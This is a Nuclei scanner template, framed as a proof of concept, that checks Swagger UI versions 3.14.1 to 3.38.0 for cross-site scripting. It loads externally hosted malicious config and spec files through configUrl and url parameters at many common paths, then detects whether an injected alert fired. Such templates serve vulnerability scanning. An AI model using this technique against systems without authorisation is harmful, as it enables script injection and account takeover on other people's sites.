id: swagger-ui-xss

info:
  name: PoC for Swagger-UI XSS
  author: MrL872
  severity: medium
  description: |
    Swagger UI versions affected from 3.14.1 to, but not including 3.38.0. Fixed in 2021.
  reference:
    - https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
  metadata:
    max-request: 14
  tags: xss,swagger-ui

headless:
  - steps:
      - action: navigate
        args:
          url: "{{RootURL}}/docs?configUrl=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/config.json"
      - action: navigate
        args:
          url: "{{RootURL}}/swagger-ui.html?configUrl=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/config.json"
      - action: navigate
        args:
          url: "{{RootURL}}/swagger-ui.html?url=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/xss-domain.yaml"
      - action: navigate
        args:
          url: "{{RootURL}}/swagger-ui.html?url=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/xss-fetch.yaml"
      - action: navigate
        args:
          url: "{{RootURL}}/index.html?configUrl=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/config.json"
      - action: navigate
        args:
          url: "{{RootURL}}/index.html?url=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/xss-domain.yaml"
      - action: navigate
        args:
          url: "{{RootURL}}/index.html?url=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/xss-fetch.yaml"
      - action: navigate
        args:
          url: "{{RootURL}}/swagger/index.html?url=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/xss-domain.yaml"
      - action: navigate
        args:
          url: "{{RootURL}}/swagger/index.html?url=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/xss-fetch.yaml"
      - action: navigate
        args:
          url: "{{RootURL}}/swagger/index.html?configUrl=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/config.json"
      - action: navigate
        args:
          url: "{{RootURL}}/swagger-ui/index.html?url=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/xss-fetch.yaml"
      - action: navigate
        args:
          url: "{{RootURL}}/swagger-ui/index.html?url=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/xss-domain.yaml"
      - action: navigate
        args:
          url: "{{RootURL}}/swagger-ui/index.html?configUrl=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/config.json"
      - action: navigate
        args:
          url: "{{RootURL}}/docs?url=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/xss-fetch.yaml"
      - action: navigate
        args:
          url: "{{RootURL}}/docs?url=https://raw.githubusercontent.com/vulnspace/nuclei-templates/main/swagger-ui-xss/xss-domain.yaml"

      - action: waitload

      - action: script
        args:
          code: |
            () => {
              window.originalAlert = window.alert;
              window.alert = function(message) {
                window.alertTriggered = true;
              }
            }

      - action: sleep

      - action: script
        name: alerts
        args:
          code: |
            () => {
              return window.alertTriggered;
            }

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: alerts
        words:
          - "true"

      - type: word
        part: body
        words:
          - "swagger"
        case-insensitive: true
